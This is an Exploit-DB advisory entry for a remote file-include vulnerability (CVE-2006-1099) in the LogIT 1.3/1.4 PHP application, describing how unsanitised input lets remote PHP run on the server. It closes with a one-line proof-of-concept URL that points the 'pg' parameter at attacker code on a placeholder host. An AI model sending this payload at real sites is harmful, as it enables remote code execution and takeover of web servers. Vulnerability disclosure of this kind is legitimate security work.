LogIT 1.3/1.4 - Remote File Include Vulnerability

2006-03-02T00:00:00
ID EDB-ID:27345
Type exploitdb
Reporter botan
Modified 2006-03-02T00:00:00

Description

LogIT 1.3/1.4 Remote File Include Vulnerability. CVE-2006-1099. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/16932/info

LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.

Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. 

LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.

http://www.example.com/?pg=http://www.example2.com/evilcode